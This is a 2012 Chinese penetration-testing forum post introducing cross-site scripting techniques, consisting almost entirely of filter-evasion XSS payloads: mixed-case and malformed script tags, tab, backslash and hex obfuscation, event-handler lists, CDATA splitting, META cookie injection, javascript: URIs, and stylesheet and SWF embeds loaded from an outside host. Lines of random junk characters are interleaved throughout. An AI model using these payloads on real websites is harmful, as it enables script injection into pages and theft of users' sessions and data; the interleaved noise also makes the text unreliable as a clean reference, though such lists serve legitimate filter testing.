中国网络渗透测试联盟
标题:
Cross Site Scripting(XSS)攻击手法介绍
[打印本页]
作者:
admin
时间:
2012-12-31 09:59
标题:
Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写
0 L- T1 M% E+ f6 h8 a
8 O7 B. d9 F6 U( Y# A8 B( T H' m
6 g! d6 y# h7 {0 c
- D3 d/ z% P5 k9 b, t
<sCript>alert(‘d’)</scRipT>
0 `$ z/ l5 z1 r+ ]! P
: h+ j1 d+ g+ f* S
2. 利用多加一些其它字符来规避Regular Expression的检查
) ~% @% M& I& S- N; Q( M
3 E7 J" I" y9 l2 q' L0 s
<<script>alert(‘c’)//<</script>
6 @6 I$ w- @* L& i- b
/ b% U# P2 |3 U' a) v
<SCRIPT a=">" SRC="t.js"></SCRIPT>
/ L: `) s- b7 M& [1 c
+ j. x, t8 _4 u" V
<SCRIPT =">" SRC="t.js"></SCRIPT>
" ?7 w5 J2 z- ^3 ~2 }. S1 O
* M! q& i5 ]1 K% T; `" T
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
5 d3 W, x7 i; r- T1 w3 {: c* b
% i# ~, e {' U2 L
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
/ B" n7 u( _. h" ^" h
+ q; J5 K$ | L1 m( e+ G2 g
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
& y7 X! N" `0 w% L
+ _9 f# Z! }4 L
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
0 G, Y% [- m) f: {: d
r! ]! w2 c [% V- S/ B
3. 以其它扩展名取代.js
: X4 m4 w+ S4 `% L ^ {: [ m ^% V) B
9 D) s! N2 t: j- M% T5 n
<script src="bad.jpg"></script>
; o9 s, c/ V# ^, g
+ f' ]/ j7 n9 y) c, S) V
4. 将Javascript写在CSS档里
. |! z" H# }$ D: V& K" z
3 Z: X% X& N i4 D
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
+ y6 }2 O: d& l; Y4 ^/ ~
' B- a9 E2 T) {8 w. _0 c
example:
0 o2 [$ w5 i4 H- R
; x* T8 I4 a8 B) h1 B
body {
1 W: k5 B# a: x, {- B2 [: m* Z. p# w
: g" E. I" e% b. O& S
background-image: url(‘javascript:alert("XSS");’)
, v+ @5 i% h! W, V3 U
6 {" h0 M& V. p5 S# X. N
}
- l2 l1 L* a; h f! e, {' Q/ N
. u _7 ^, ?2 i# |1 z
5. 在script的tag里加入一些其它字符
& k( p3 F5 c6 y) x& V( n3 F" O
- ~( z8 }: I; C: W. D( c6 S% e
<SCRIPT/SRC="t.js"></SCRIPT>
4 ]# K$ R/ @3 b
/ P' U6 y( w2 V p8 Z# J
<SCRIPT/anyword SRC="t.js"></SCRIPT>
5 r' K3 a$ x/ M; H0 q1 x
: t# z( \+ W$ R; f0 B& {
6. 使用tab或是new line来规避
9 C: g4 _2 j2 R+ m5 F
. `7 D+ m6 ]7 |! N( |# s
<img src="jav ascr ipt:alert(‘XSS3′)">
5 J4 t# ]+ r/ g' S% O+ e9 d3 E2 N. W
7 X1 w) j }3 `# b9 o
<img src="jav ascr ipt:alert(‘XSS3′)">
4 ~$ a. z6 K& e% E6 X/ g5 v$ E
; e! u% C/ }+ V% Z- G
<IMG SRC="jav ascript:alert(‘XSS’);">
7 N; }9 l5 Y, w3 s
" W# \0 Y1 p, T
-> tag
* e. V( S& K" X5 l; V
3 `% D" \! i f! U- \
-> new line
, \$ A; k8 @1 d
0 J7 K7 a |/ F
7. 使用"\"来规避
2 j( O4 g7 Z& k- }8 N
7 R6 e8 @8 a) Z \
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
- |7 t& }0 J: C* ~' h; x, \
" ]; h$ Z2 T: b9 d7 Y
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
0 o# F# j6 h; o- S+ _
, \; O1 Z( f. u
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
& s/ e1 d0 b0 o+ N9 v3 `+ ?
* f! z1 `: j/ U- Z$ w
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
6 J$ W, @) V6 p: {* ~5 v; v
, ^5 |/ V% ~/ l' m1 G: O# `4 l \9 a- ?
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
, r, J5 Q0 W! Y6 V" h, U! L
# k4 z/ L- x- @5 j, X2 W3 @
8. 使用Hex encode来规避(也可能会把";"拿掉)
: J4 z, h9 o, R! M) A1 v
/ s) g. g8 ^( M
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
, M% ] t K p" i8 O
% V* X' Q1 d) j4 E- ~. {
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
, `% i, U& r. B( \& I
, P8 I; z7 g6 \1 q h% B6 Y. N
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
: o: z" p9 P$ U# g, Y8 X4 b
$ ]: l) X" E: Y
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
Y# k! z, g8 h8 D1 E" C
3 V" p! M- {) j" _
9. script in HTML tag
$ ~6 x1 ?- }% n: w( _/ H. {7 d
" z- f! C& ~% d( o
<body onload=」alert(‘onload’)」>
: I9 b! [8 i- {$ C0 g8 E
0 ?" J$ \9 b, \( i1 f
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
3 M. [6 e r% V! q) B- Z0 }/ G- t0 D
. |, M: m+ L% j6 x
10. 在swf里含有xss的code
9 O9 w* d7 u! v3 t
5 f8 ^9 W6 j8 L. n$ N$ n/ B9 x
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
% C+ _ v/ O1 Y; X3 f( u. b
4 j1 N3 f, W2 A
11. 利用CDATA将xss的code拆开,再组合起来。
" w. q! x* ?/ k6 V& v) j
( k2 Q1 k0 s! x9 L
<XML ID=I><X><C>
: Z3 R3 j6 a7 G) i' w5 N: ?( @
; M+ ]7 ]/ B0 N- x7 ]
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
" K) ~& Z' t9 ]4 }! i
- A* K- b" E' H
</C></X>
& o" [& ^4 B9 @% I+ v5 F H
$ N( ~3 z# x7 x: ]
</xml>
% f6 ]% N8 Q% A* C u
+ q- {% Q2 m2 e$ m! k# E* p$ Q4 K: J
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
1 Y2 V: i4 V ^! S+ n& h9 h$ P
' I& E, G0 B. H. ~; A
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
$ Z# A- \ w0 ^1 t; g
5 |4 N# p" M, T' f; W# a8 ?
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
H3 n# c P" o8 H! M( h4 g7 v
/ A' b- b: e0 e! I
12. 利用HTML+TIME。
) z% A( Z, q8 p5 n& U, L
) g! `9 x' t3 L; Z4 e
<HTML><BODY>
$ r1 M% x0 v8 ^( k3 O/ }
$ l+ [( k: ]0 L& B
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
; W" _' H0 v! K" ]
9 i& L) K5 P% S8 F. y+ V- V
<?import namespace="t" implementation="#default#time2">
. K$ D0 ?6 ?& X6 q9 P( P
& @! z& S% s2 x' Q# ?* ]8 X
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
. s4 x9 C( Z" x1 F
. J, @7 X! Z" r/ i
</BODY></HTML>
* L9 @3 ~9 P w' ]# B; T u1 \3 P
) f" I+ I* r- }2 W r
13. 透过META写入Cookie。
" J7 }! r) H5 ]- ]& E
: a; b8 X0 U' W4 Z( f5 q0 C
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
7 N! B( H- J: f2 _7 L. w, s$ H
" Z. ?4 X! v0 |$ F+ T( O
14. javascript in src , href , url
& R, x3 l; M9 V- r2 F) F5 E" {
8 u6 l$ o$ S$ ?$ l0 z; E$ C
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
+ U- d2 N$ l4 Z U; n( m9 ~- e
& k5 N! U: `$ @ R+ m0 N, ^# H. Q
<img src="javascript:alert(‘XSS3′)">
8 y- c( x% F$ L4 F/ O
; O* O) Y; I% A$ |8 N1 s) f, i
<IMG DYNSRC="javascript:alert(‘XSS20′)">
, r+ n4 m' Y: X# m; D, h
( ~5 b0 ?( J3 S4 O: Z- v w2 f
<IMG LOWSRC="javascript:alert(‘XSS21′)">
5 E1 c* B3 R+ }, z" m3 S5 o
& B: C$ V% J/ R# Y6 ]" |8 Y
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
" e% x/ L5 I- i6 K
9 E7 z7 U* t0 \3 A0 A
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
- \$ P1 Z3 a% ]6 P6 l5 ]" ]. N
9 o- t1 u9 x( C' j/ {/ R" F/ k
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
2 M; K( I% b- Z6 {) i2 A
+ w% e m8 n" B3 r: T2 a
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
9 m- t: e8 R9 S# V( ?
6 F# t9 ]- w7 a6 Y
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
2 a0 G1 Y$ ~& s6 x8 a
# n, m" G: e2 f! [( M w2 L
</STYLE><A CLASS=XSS></A>
: S. R5 y' ^5 ]5 B! P9 j
! X W* G$ r4 i3 d9 s
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
5 n9 a1 Z# g. k+ ~+ J! |" K& v
, z! ]- v& c& b5 h, f
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2